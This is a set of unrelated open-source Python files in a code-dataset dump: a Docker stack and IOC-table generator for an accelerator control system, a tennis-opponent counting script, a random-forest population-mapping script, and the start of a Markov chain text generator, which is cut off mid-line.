('si-ps-trims-qs-c1234-ia02', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia03': ('si-ps-trims-qs-c1234-ia03', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia04': ('si-ps-trims-qs-c1234-ia04', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia05': ('si-ps-trims-qs-c1234-ia05', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia06': ('si-ps-trims-qs-c1234-ia06', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia07': ('si-ps-trims-qs-c1234-ia07', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia08': ('si-ps-trims-qs-c1234-ia08', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia09': ('si-ps-trims-qs-c1234-ia09', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia10': ('si-ps-trims-qs-c1234-ia10', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia11': ('si-ps-trims-qs-c1234-ia11', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia12': ('si-ps-trims-qs-c1234-ia12', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia13': ('si-ps-trims-qs-c1234-ia13', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia14': ('si-ps-trims-qs-c1234-ia14', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia15': ('si-ps-trims-qs-c1234-ia15', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia16': ('si-ps-trims-qs-c1234-ia16', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia17': ('si-ps-trims-qs-c1234-ia17', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia18': ('si-ps-trims-qs-c1234-ia18', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia19': ('si-ps-trims-qs-c1234-ia19', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-c1234-ia20': ('si-ps-trims-qs-c1234-ia20', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia01': ('si-ps-trims-qs-m12-ia01', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia02': ('si-ps-trims-qs-m12-ia02', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia03': ('si-ps-trims-qs-m12-ia03', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia04': ('si-ps-trims-qs-m12-ia04', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia05': ('si-ps-trims-qs-m12-ia05', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia06': ('si-ps-trims-qs-m12-ia06', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia07': ('si-ps-trims-qs-m12-ia07', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia08': ('si-ps-trims-qs-m12-ia08', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia09': ('si-ps-trims-qs-m12-ia09', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia10': ('si-ps-trims-qs-m12-ia10', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia11': ('si-ps-trims-qs-m12-ia11', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia12': ('si-ps-trims-qs-m12-ia12', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia13': ('si-ps-trims-qs-m12-ia13', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia14': ('si-ps-trims-qs-m12-ia14', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia15': ('si-ps-trims-qs-m12-ia15', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia16': ('si-ps-trims-qs-m12-ia16', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia17': ('si-ps-trims-qs-m12-ia17', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia18': ('si-ps-trims-qs-m12-ia18', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia19': ('si-ps-trims-qs-m12-ia19', ('dips', 'quads-qd', 'quads-qfq')),\n 'trims-qs-m12-ia20': ('si-ps-trims-qs-m12-ia20', ('dips', 'quads-qd', 'quads-qfq')),\n },\n 'si-id': {\n 'epu50': 'si-id-epu50',\n 'conv': ('si-id-conv', ('epu50', )),\n },\n 'it-ps': {\n 'lens': 'it-ps-lens',\n },\n 'si-ps-fastcorrs': {\n 'conv-ia01': 'si-ps-conv-fastcorrs-ia01',\n 'conv-ia02': 'si-ps-conv-fastcorrs-ia02',\n 'conv-ia03': 'si-ps-conv-fastcorrs-ia03',\n 'conv-ia04': 'si-ps-conv-fastcorrs-ia04',\n 'conv-ia05': 'si-ps-conv-fastcorrs-ia05',\n 'conv-ia06': 'si-ps-conv-fastcorrs-ia06',\n 'conv-ia07': 'si-ps-conv-fastcorrs-ia07',\n 'conv-ia08': 'si-ps-conv-fastcorrs-ia08',\n 'conv-ia09': 'si-ps-conv-fastcorrs-ia09',\n 'conv-ia10': 'si-ps-conv-fastcorrs-ia10',\n 'conv-ia11': 'si-ps-conv-fastcorrs-ia11',\n 'conv-ia12': 'si-ps-conv-fastcorrs-ia12',\n 'conv-ia13': 'si-ps-conv-fastcorrs-ia13',\n 'conv-ia14': 'si-ps-conv-fastcorrs-ia14',\n 'conv-ia15': 'si-ps-conv-fastcorrs-ia15',\n 'conv-ia16': 'si-ps-conv-fastcorrs-ia16',\n 'conv-ia17': 'si-ps-conv-fastcorrs-ia17',\n 'conv-ia18': 'si-ps-conv-fastcorrs-ia18',\n 'conv-ia19': 'si-ps-conv-fastcorrs-ia19',\n 'conv-ia20': 'si-ps-conv-fastcorrs-ia20',\n 'diag': 'si-ps-diag-fastcorrs',\n },\n 'si-ap-idff': {\n 'epu50': 'si-ap-idff-epu50',\n 'papu50': 'si-ap-idff-papu50',\n }\n # 'bl-ap-imgproc': {\n # 'imgproc': 'bl-ap-imgproc',\n # },\n }\n\n\nclass DockerStackConfig(ServiceConfig):\n \"\"\"Docker stack configuration.\"\"\"\n\n IMAGE_TAG_CSCONSTS = '__FAC_CSCONSTS_TAG_TEMPLATE__'\n IMAGE_TAG_IOCS = '__FAC_IOC_TAG_TEMPLATE__'\n\n def __init__(self, image_tag):\n self.version = '3.7'\n self.image_tag = image_tag\n self.networks = ['host_network'] if 'CSCONSTS' in image_tag else \\\n ['ioc-network']\n self.replicas = '1'\n self.condition = 'any'\n self.driver = 'json-file'\n\n @staticmethod\n def get_command(app):\n \"\"\"Return command.\"\"\"\n strf = \"bash -c '/ioc-apps/\" + app + \".bash'\"\n return strf\n\n def get_image(self, app):\n \"\"\"Return image.\"\"\"\n if 'CSCONSTS' in self.image_tag:\n image = 'fac-csconsts'\n elif 'li-ps' in app and 'conv' not in app and 'diag' not in app:\n image = 'fac-iocs-li-ps'\n else:\n image = 'fac-iocs'\n strf = 'dockerregistry.lnls-sirius.com.br/fac/' + image + \":\"\n strf += self.image_tag\n return strf\n\n def str_header(self):\n strf = ''\n strf += 'version: \"' + self.version + '\"'\n strf += '\\n'\n strf += '\\n' + 'services:'\n return strf\n\n def str_service(self, app, node, depends=None):\n strf = ''\n strf += '\\n' + ' image: ' + self.get_image(app)\n if depends:\n strf += '\\n' + ' depends_on:'\n for item in depends:\n strf += '\\n' + ' - \"' + item + '\"'\n if 'CSCONSTS' not in self.image_tag:\n strf += '\\n' + ' command: ' + DockerStackConfig.get_command(app)\n strf += '\\n' + ' volumes:'\n strf += '\\n' + ' - \"/storage/common/fac/iocs-log:/home/sirius/iocs-log\"'\n strf += '\\n' + ' deploy:'\n strf += '\\n' + ' placement:'\n strf += '\\n' + ' constraints:'\n strf += '\\n' + ' - node.hostname == ' + node\n strf += '\\n' + ' replicas: ' + self.replicas\n strf += '\\n' + ' restart_policy:'\n strf += '\\n' + ' condition: ' + self.condition\n strf += '\\n' + ' logging:'\n strf += '\\n' + ' driver: ' + '\"' + self.driver + '\"'\n strf += '\\n' + ' options:'\n strf += '\\n' + ' max-file: ' + '\"10\"'\n strf += '\\n' + ' max-size: ' + '\"10m\"'\n strf += '\\n' + ' networks:'\n for network in self.networks:\n strf += '\\n' + ' - ' + network\n return strf\n\n def str_networks(self):\n strf = ''\n strf += '\\n' + 'networks:'\n strf += '\\n' + ' ioc-network' + ':'\n strf += '\\n' + ' external: true'\n strf += '\\n' + ' name: \"host\"'\n return strf\n\n\nclass DockerLowStackConfig(DockerStackConfig):\n \"\"\"Docker low stack configuration.\"\"\"\n\n def __init__(self, app, node):\n super().__init__(DockerStackConfig.IMAGE_TAG_IOCS)\n self.app = app\n self.node = node\n\n def __str__(self):\n strf = self.str_header()\n strf += '\\n'\n strf += '\\n' + ' iocs:'\n strf += self.str_service(self.app, self.node)\n strf += '\\n'\n strf += self.str_networks()\n return strf\n\n def save_config_file(self):\n fname = 'docker-stack-' + self.app + '.yml'\n print(self, file=open(fname, 'w'))\n\n\nclass DockerHighStackConfig(DockerStackConfig):\n \"\"\"Docker high stack configuration.\"\"\"\n\n def __init__(self, stack):\n super().__init__(DockerStackConfig.IMAGE_TAG_IOCS)\n self.stack = stack\n self.services = ServiceConfig.STACKS[stack]\n\n def __str__(self):\n strf = self.str_header()\n for service, app in self.services.items():\n if isinstance(app, (tuple, list)):\n app, depends = app\n else:\n depends = None\n # print(service, app, depends)\n node = ServiceConfig.SERVICES[app]\n strf += '\\n'\n strf += '\\n' + ' ' + service + ':'\n strf += self.str_service(app, node, depends)\n strf += '\\n'\n strf += self.str_networks()\n return strf\n\n def save_config_file(self):\n fname = 'docker-stack-' + self.stack + '.yml'\n print(self, file=open(fname, 'w'))\n\n\nclass DockerCSConstsConfig(DockerStackConfig):\n \"\"\"Docker control-system-constants configuration.\"\"\"\n\n def __init__(self, app, node):\n super().__init__(DockerStackConfig.IMAGE_TAG_CSCONSTS)\n self.app = app\n self.node = node\n\n def __str__(self):\n strf = self.str_header()\n strf += '\\n'\n strf += '\\n' + ' facs-csconsts:'\n strf += self.str_service(self.app, self.node)\n strf += '\\n'\n strf += self.str_networks()\n return strf\n\n def save_config_file(self):\n fname = 'docker-stack-' + self.app + '.yml'\n print(self, file=open(fname, 'w'))\n\n def str_networks(self):\n strf = ''\n strf += '\\n' + 'networks:'\n strf += '\\n' + ' host_network' + ':'\n strf += '\\n' + ' external:'\n strf += '\\n' + ' name: \"host\"'\n return strf\n\n\ndef generate_service_files():\n \"\"\"Generate docker service file.\"\"\"\n\n for app, node in ServiceConfig.SERVICES_CSCONSTS.items():\n config = DockerCSConstsConfig(app=app, node=node)\n config.save_config_file()\n\n for app, node in ServiceConfig.SERVICES.items():\n config = DockerLowStackConfig(app=app, node=node)\n config.save_config_file()\n\n for stack in ServiceConfig.STACKS:\n config = DockerHighStackConfig(stack)\n config.save_config_file()\n\n\ndef generate_service_2_ioc_table():\n \"\"\"Generate docker service -> IOCs table.\"\"\"\n\n cont2serv = dict()\n for stack, sub2serv in ServiceConfig.STACKS.items():\n for sub, serv in sub2serv.items():\n if isinstance(serv, (tuple, list)):\n serv = serv[0]\n cont2serv['facs-' + stack + '_' + sub] = serv\n serv2cont = {v: k for k, v in cont2serv.items()}\n\n cont2iocs = dict()\n for service in ServiceConfig.SERVICES:\n if service in serv2cont:\n container = serv2cont[service]\n else:\n container = 'facs-' + service\n\n appdir_path = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), '..', 'apps')\n appfile_path = os.path.join(appdir_path, service + '.bash')\n\n iocs = list()\n with open(appfile_path, 'r') as file:\n text = file.read()\n lines = text.splitlines()\n for lin in lines:\n lin = lin.strip()\n if not lin or lin[0] == '#':\n continue # empty line or comment\n elif '/ioc-logs/sirius-ioc-' in lin:\n if ('-ps' in lin or 'idff' in lin) and 'conv' not in lin:\n iocname = lin.split('/bin/sirius-ioc-')[1]\n iocname = iocname.split(' | tee ')[0]\n iocname = iocname.replace('.py', '').replace(' -n', '')\n else:\n iocname = lin.split('/ioc-logs/sirius-ioc-')[1]\n iocname = iocname.split(' &')[0]\n iocname = iocname.split('.log')[0]\n iocs.append(iocname)\n cont2iocs[container] = iocs\n\n data = dict()\n for container, iocs in cont2iocs.items():\n data[container] = dict()\n for ioc in iocs:\n ioc = ioc.strip(' ')\n prefixes = list()\n if ('-ps' in ioc or '-pu' in ioc) and 'conv' not in ioc:\n prs = ioc.replace('\"', '')\n prs = prs.split(' ')\n if prs[0] == 'as-ps':\n psm = PSSearch.conv_bbbname_2_psnames(prs[1])\n prefixes.extend([p[0] for p in psm])\n elif 'diag' in prs[0]:\n if 'ps' in ioc:\n filt = {'sec': prs[1], 'sub': prs[2], 'dev': prs[3]}\n else:\n filt = {\n 'dis': 'PU', 'dev': '.*(Kckr|Sept)',\n 'propty_name': '(?!:CCoil).*'}\n devnames = PSSearch.get_psnames(filt)\n prefixes.extend([p+':Diag' for p in devnames])\n elif prs[0] == 'li-ps':\n prefixes.append(prs[1])\n else:\n prs = ioc.split('-')\n if 'conv' in ioc:\n if 'id' in ioc:\n idnames = IDSearch.get_idnames({'dev': 'APU.*'})\n prefixes.extend([i+':Kx' for i in idnames])\n else:\n if prs[0] == 'li':\n filt = {'sec': 'LI'}\n elif prs[1] == 'pu':\n filt = {'dis': 'PU'}\n elif 'fastcorr' in ioc:\n sub = prs[4][-2:] + '.*'\n filt = {'sec': 'SI', 'sub': sub, 'dev': 'FC.*'}\n psnames = PSSearch.get_psnames(filt)\n for psn in psnames:\n psn = _PVName(psn)\n try:\n magf = PSSearch.conv_psname_2_magfunc(psn)\n strg = util.get_strength_label(magf)\n prefixes.append(str(psn.substitute(\n propty=psn.propty_name+strg)))\n except ValueError:\n pass\n elif 'id' in ioc:\n if 'idff' in ioc:\n idn = ioc.split(' ')[1]\n pref = 'SI-' + _PVName(idn).sub + ':AP-IDFF'\n prefixes.append(pref)\n else:\n iddev = ioc.split('-')[2].upper()\n idnames = IDSearch.get_idnames({'dev': iddev})\n # needs conversion to str to avoid SiriusPVName __str__\n prefixes.extend([str(idname) for idname in idnames])\n elif 'diag' in prs[2]:\n if prs[0] == 'li':\n devs = LIDiagConst.ALL_DEVICES\n prefixes.extend([d+':Diag' for d in devs])\n elif prs[1] == 'rf':\n devs = RFDiagConst.ALL_DEVICES\n prefixes.extend([d+':Diag' for d in devs])\n elif prs[1] == 'ap':\n if prs[2] == 'currinfo':\n if 'lifetime' in ioc or ioc.startswith('bo'):\n pref = prs[0].upper() + '-Glob:AP-CurrInfo'\n prefixes.append(pref)\n else:\n dbs = get_currinfo_database(prs[0].upper())\n devs = {str(_PVName(p).device_name) for p in dbs}\n prefixes.extend(sorted(devs))\n elif prs[0] == 'bl' and prs[2] == 'imgproc':\n bline = prs[3][0:3].upper()\n hutch = 'A' if prs[3][-1] == 1 else 'B'\n cam = 'BASLER01'\n pref = ':'.join([bline, hutch, cam])\n prefixes.append(pref)\n else:\n devname = prs[2][0].upper() + prs[2][1:]\n devname = devname.replace('ang', 'Ang')\n devname = devname.replace('corr', 'Corr')\n devname = devname.replace('shift', 'Shift')\n devname = devname.replace('ctrl', 'Ctrl')\n devname = devname.replace('ofb', 'OFB')\n devname = devname.replace('Stabinfo', 'StabilityInfo')\n devname = devname.replace('Energy', 'MeasEnergy')\n pref = prs[0].upper() + '-Glob:AP-' + devname\n prefixes.append(pref)\n elif prs[1] == 'ti':\n filt = {'sec': prs[0].upper()}\n if len(prs) == 4:\n if prs[3] == 'bpms':\n filt['dev'] = 'BPM(?!-PsMtn).*'\n else:\n idx = prs[3].capitalize().replace('trim', 'Trim')\n filt['idx'] = idx\n devnames = HLTimeSearch.get_hl_triggers(filt)\n else:\n indv = ('Corrs', 'Skews', 'QTrims', 'BPM')\n devnames = [\n t for t in HLTimeSearch.get_hl_triggers(filt)\n if not t.endswith(indv)]\n prefixes.extend([str(d) for d in devnames])\n data[container][ioc] = prefixes\n\n fname = 'facs.yml'\n hmsg = '# This is a yml file that was automatically generated by\\n'\n hmsg += '# the generate_service_files.py script, available at the\\n'\n hmsg += '# docker-machine-applications repository.\\n'\n hmsg += '#\\n'\n hmsg += '# It can be imported into python3 code as a dict with:\\n'\n hmsg += '# ```\\n'\n hmsg += '# with open(\"facs.yml\") as file:\\n'\n hmsg += '# data = yaml.load(file)\\n'\n hmsg += '# ```\\n'\n hmsg += '# where `yaml` is a python3 module available in `pip3`.\\n'\n hmsg += '#\\n'\n hmsg += '# The blocks below define the relation:\\n'\n hmsg += '# SERVICE:\\n'\n hmsg += '# IOC_X:\\n'\n hmsg += '# PREFIX_A\\n'\n hmsg += '# PREFIX_B\\n'\n hmsg += '# IOC_Y:\\n'\n hmsg += '# PREFIX_C\\n'\n hmsg += '# ...\\n'\n hmsg += '# where SERVICE is the name of the docker service, IOC_X\\n'\n hmsg += '# and IOC_Y are references to IOC processes running into\\n'\n hmsg += '# the docker container, PREFIX_A and PREFIX_B, for IOC_X,\\n'\n hmsg += '# and PREFIX_C, for IOC_Y, are prefixes of PVs that are\\n'\n hmsg += '# provided by each of the IOCs.\\n\\n'\n\n with open(fname, 'w') as file:\n file.write(hmsg)\n for container, iocs in data.items():\n file.write(yaml.dump({container: iocs}, default_flow_style=False))\n file.write('\\n')\n\n\nif __name__ == \"__main__\":\n generate_service_files()\n generate_service_2_ioc_table()\n","repo_name":"lnls-sirius/docker-machine-applications","sub_path":"tools/generate_service_files.py","file_name":"generate_service_files.py","file_ext":"py","file_size_in_byte":37753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26170403389","text":"import pandas as pd\n\ndef _sum(arr): \n sum=0\n for i in arr: \n sum = sum + i \n return(sum)\n#78 100644 2020\ndataset2018 = pd.read_csv('./data/HC_players_2018.csv')\ndataset2019 = pd.read_csv('./data/HC_players_2019.csv')\ndataset2020 = pd.read_csv('./data/HC_players_2020.csv')\ndatasetAll = pd.read_csv('./data/HC_players_all.csv')\ndf2018 = pd.DataFrame(dataset2018)\ndf2019 = pd.DataFrame(dataset2019)\ndf2020 = pd.DataFrame(dataset2020)\ndfAll = pd.DataFrame(datasetAll)\nplayerCount2018 = []\nplayerCount2019 = []\nplayerCount2020 = []\nplayerCount = []\ndatasetMatches2018 = pd.read_csv('./data/atp_matches_2018.csv')\ndfMatches2018 = pd.DataFrame(datasetMatches2018)\ndatasetMatches2019 = pd.read_csv('./data/atp_matches_2019.csv')\ndfMatches2019 = pd.DataFrame(datasetMatches2019)\ndatasetMatches2020 = pd.read_csv('./data/atp_matches_2020.csv')\ndfMatches2020 = pd.DataFrame(datasetMatches2020)\n#progress = 0\nfor d in df2018.itertuples():\n #progress += 1\n #print(progress)\n playerOpponents2018 = []\n for d2 in dfMatches2018.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponents2018)):\n playerOpponents2018.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponents2018))) :\n playerOpponents2018.append(d2[8])\n playerCount2018.append(len(playerOpponents2018))\n#progress = 0\nfor d in df2019.itertuples():\n #progress += 1\n #print(progress)\n playerOpponents2019 = []\n for d2 in dfMatches2019.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponents2019)):\n playerOpponents2019.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponents2019))) :\n playerOpponents2019.append(d2[8])\n playerCount2019.append(len(playerOpponents2019))\n#progress = 0\nfor d in df2020.itertuples():\n #progress += 1\n #print(progress)\n playerOpponents2020 = []\n for d2 in dfMatches2020.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponents2020)):\n playerOpponents2020.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponents2020))) :\n playerOpponents2020.append(d2[8])\n playerCount2020.append(len(playerOpponents2020))\n#progress = 0\nfor d in dfAll.itertuples():\n #progress += 1\n #print(progress)\n playerOpponentsAll = []\n for d2 in dfMatches2018.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponentsAll)):\n playerOpponentsAll.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponentsAll))) :\n playerOpponentsAll.append(d2[8])\n for d2 in dfMatches2019.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponentsAll)):\n playerOpponentsAll.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponentsAll))) :\n playerOpponentsAll.append(d2[8])\n for d2 in dfMatches2019.itertuples():\n if((d[1] == d2[8]) and not (d2[16] in playerOpponentsAll)):\n playerOpponentsAll.append(d2[16])\n elif (((d[1] == d2[16]) and not (d2[8] in playerOpponentsAll))) :\n playerOpponentsAll.append(d2[8])\n playerCount.append(len(playerOpponentsAll))\nprint('REZULTATI 2018:', _sum(playerCount2018) / len(playerCount2018))\nprint('REZULTATI 2019:', _sum(playerCount2019) / len(playerCount2019))\nprint('REZULTATI 2020:', _sum(playerCount2020) / len(playerCount2020))\nprint('REZULTATI TOTAL:', _sum(playerCount) / len(playerCount))\n","repo_name":"mladen-995/social-network-analysis","sub_path":"scripts/script-one.py","file_name":"script-one.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23938348987","text":"import pandas as pd\nimport numpy as np\nimport json\nfrom conv import *\nfrom utils import *\nfrom sklearn.ensemble import RandomForestRegressor\n\n\n# 100m\nRESOLUTION = 100\nN_ROW = 1540\nN_COLUMN = 1250\n\n## 200m\n# RESOLUTION = 200\n# N_ROW = 770\n# N_COLUMN = 625\n\n## 500m\n# RESOLUTION = 500\n# N_ROW = 308\n# N_COLUMN = 250\n\nrelative_src = 'resource/feature_vector_of_pixel_grade_proportions_' + str(RESOLUTION) +'.txt'\ncounty_src = r\"resource/wuhanCountyPop.txt\"\nsub_src = r\"resource/wuhanSubDistrictPop.txt\"\nsub_pop = r\"resource/sub_pop.txt\"\nsub_pd = r\"resource/sub_population_density.txt\"\n\nsubPop = pd.read_table(sub_pop,sep=',',index_col='gid')\nsubPop = subPop.sort_index()\n\nsub_pd = pd.read_table(sub_pd,sep=',',index_col='gid')\nsub_pd = sub_pd.sort_index()\n\n\nsubPara_relative = pd.read_table(relative_src,sep=',',index_col='subid')\nsubPara_relative = subPara_relative.sort_index()\n\n\n\n\ngrid_src = r\"..\\Data\\grid\" + str(RESOLUTION) +\".csv\"\ngridInfo = pd.read_table(grid_src,sep=',',index_col='id')\ngridInfo = gridInfo.sort_index()\n\nini_matrix = np.zeros((N_ROW,N_COLUMN))\n\ncountyInfo = pd.read_table(county_src,sep=',',index_col='countyId')\ncounty_dict = countyInfo.to_dict()['countyPopNum']\nsubInfo = pd.read_table(sub_src,sep=',',index_col='subId')\n\nsub_dict = subInfo.to_dict()['subPopNum']\n\nindex_matrix = np.array(gridInfo.index).reshape((N_ROW,N_COLUMN))[::-1]#索引的二维矩阵\ncounty_matrix = np.array(gridInfo['county_id']).reshape((N_ROW,N_COLUMN))[::-1]#countyid的二维矩阵\nsub_matrix = np.array(gridInfo['sub_id']).reshape((N_ROW,N_COLUMN))[::-1]#subid的二维矩阵\nbuilding_area_matrix = np.array(gridInfo['building_area']).reshape((N_ROW,N_COLUMN))[::-1]#是否又建筑物的二维矩阵\n\n\nf = open(\"resource/class_\"+ str(RESOLUTION) +\".txt\",'r')\nclasses = json.loads(f.read())\nf.close()\nresult_matrixs =[]\n\n\nfor key,value in classes.items():\n if \"poi\" in key:\n tmp_matrix = np.array(gridInfo['count_'+key.replace('_','')]).reshape((N_ROW,N_COLUMN))[::-1]\n elif \"night\" in key:\n tmp_matrix = np.array(gridInfo['mobile_night']).reshape((N_ROW,N_COLUMN))[::-1]\n\n for i in range(len(value)):\n if i == 0:\n ini_matrix[tmp_matrix == 0] = 1\n elif i == len(value)-1:\n ini_matrix[(tmp_matrix >= int(value[i-1])) & (tmp_matrix <= int(value[i]))] = 1\n else:\n ini_matrix[(tmp_matrix >= int(value[i-1])) & (tmp_matrix < int(value[i]))] = 1\n result_matrixs.append(ini_matrix)\n ini_matrix = np.zeros((N_ROW, N_COLUMN))\n\nfor mat in result_matrixs:\n mat.resize(N_ROW*N_COLUMN,1)\n\n\n\npoi1_matrix = np.array(gridInfo['count_poi1']).reshape((N_ROW,N_COLUMN))[::-1]\npoi2_matrix = np.array(gridInfo['count_poi2']).reshape((N_ROW,N_COLUMN))[::-1]\n\npoi7_matrix = np.array(gridInfo['count_poi7']).reshape((N_ROW,N_COLUMN))[::-1]\npoi8_matrix = np.array(gridInfo['count_poi8']).reshape((N_ROW,N_COLUMN))[::-1]\npoi11_matrix = np.array(gridInfo['count_poi11']).reshape((N_ROW,N_COLUMN))[::-1]\npoi14_matrix = np.array(gridInfo['count_poi14']).reshape((N_ROW,N_COLUMN))[::-1]\npoi21_matrix = np.array(gridInfo['count_poi21']).reshape((N_ROW,N_COLUMN))[::-1]\npoi22_matrix = np.array(gridInfo['count_poi22']).reshape((N_ROW,N_COLUMN))[::-1]\npoi23_matrix = np.array(gridInfo['count_poi23']).reshape((N_ROW,N_COLUMN))[::-1]\npoi24_matrix = np.array(gridInfo['count_poi24']).reshape((N_ROW,N_COLUMN))[::-1]\npoi3_matrix = np.array(gridInfo['count_poi3']).reshape((N_ROW,N_COLUMN))[::-1]\npoi18_matrix = np.array(gridInfo['count_poi18']).reshape((N_ROW,N_COLUMN))[::-1]\npoi_matrix = poi1_matrix+poi2_matrix+poi3_matrix+poi7_matrix+poi8_matrix+poi11_matrix+poi14_matrix+poi18_matrix+poi21_matrix+poi22_matrix+poi23_matrix+poi24_matrix\nnight_point_matrix = np.array(gridInfo['mobile_night']).reshape((N_ROW,N_COLUMN))[::-1]\nnight_point_matrix[np.isnan(night_point_matrix)] = 0\n\n\nnoPoiNoBuilding = ((np.isnan(sub_matrix)==False)&(building_area_matrix == 0) & (poi_matrix ==0))\nnoPoiHasBuilding = ((np.isnan(sub_matrix)==False)&(building_area_matrix > 0) & (poi_matrix ==0))\n\n\n\nwei_matrix = np.sqrt(building_area_matrix)\nmax1 = max(wei_matrix[noPoiHasBuilding])\ntmp1_matrix = np.zeros((N_ROW, N_COLUMN))\ntmp1_matrix += 1\n\n\n\n\n\n\n\ncounty = {11: 0, 18: 0, 15: 0, 14: 0, 12: 0, 6: 0, 10: 0, 3: 0, 1: 0, 16: 0, 4: 0, 5: 0, 7: 0, 9: 0, 8: 0, 17: 0, 2: 0}\nfor i in range(1):\n rfc = RandomForestRegressor(max_features='sqrt',n_estimators=250,min_samples_leaf=1,\n oob_score=True,criterion=\"mse\",bootstrap=True,random_state=i)\n\n rfc.fit(subPara_relative, sub_pd)\n result = rfc.predict(np.hstack(result_matrixs)).reshape((N_ROW,N_COLUMN))\n\n # building patch data\n _ll = list(result[poi_matrix == 0])\n _ll.sort()\n tmp1_matrix[noPoiHasBuilding] = wei_matrix[noPoiHasBuilding] / max1\n tmp1_matrix[noPoiHasBuilding] *= _ll[0]*3\n result[noPoiHasBuilding] = tmp1_matrix[noPoiHasBuilding]\n result[noPoiNoBuilding] = 0\n # #\n\n # mobile positioning data\n x = list(result[poi_matrix > 0])\n x.sort()\n y = list(night_point_matrix[poi_matrix > 0])\n y.sort()\n [rows, cols] = result.shape\n for i in range(rows):\n for j in range(cols):\n if (poi_matrix[i, j] > 0 ):\n index_x = 0\n index_y = 0\n for index, val in enumerate(x):\n if result[i,j] < val:\n\n index_x = (index+0.0000001)/len(x)\n break\n for index, val in enumerate(y):\n if night_point_matrix[i,j] < val:\n index_y = (index+0.0000001)/len(y)\n break\n result[i,j] = x[int(len(x)*(index_y*0.5+index_x*0.5))]\n\n\n # spatial filtering\n result = conv(result, gau(3), county_matrix, 0)\n\n\n weight_matrix = normalize(result,county_matrix,county_dict)\n pop_matrix = calCountyPop(weight_matrix,county_matrix,county_dict)\n pop_dict = {}\n [rows, cols] = pop_matrix.shape\n for i in range(rows):\n for j in range(cols):\n if (np.isnan(county_matrix[i, j])):\n pass\n else:\n if (county_matrix[i, j] in pop_dict):\n\n pop_dict[county_matrix[i, j]].append(pop_matrix[i,j])\n else:\n pop_dict[county_matrix[i, j]] = []\n\n MAE, RMSE ,r2= calSubError(pop_matrix,sub_matrix,sub_dict)\n print(\"MAE :\" + str(MAE))\n print(\"RMSE :\" + str(RMSE))\n print(\"r2 :\" + str(r2))\n\n","repo_name":"ZPGuiGroupWhu/PopulationSpatialization","sub_path":"Code/populationSpatialization.py","file_name":"populationSpatialization.py","file_ext":"py","file_size_in_byte":6481,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"20991798314","text":"import random\n\n\nclass Markov_Chain(object):\n\n # storage stores \"word\": {\"word\": frequency}\n table = {}\n\n def choose_random_key(self, dictionary):\n # choose word based on probility weight\n random_int = random.uniform(0, 1)\n total_word_count = sum(dictionary.values())\n cumulative_prob = 0.0\n if len(dictionary) == 0:\n return None\n for key, val in dictionary.items():\n cumulative_prob += (val / total_word_count)\n if random_int < cumulative_prob:\n break\n return key\n\n def random_walk(self, word_count):\n string = \"\"\n prev_key = None\n for i in range(word_count):\n if prev_key is not None:\n next_key = self.choose_random_key(self.table[prev_key])\n # print(\"===> Prev_key: {}\".format(prev_key))\n # print(\"===> Next_key: 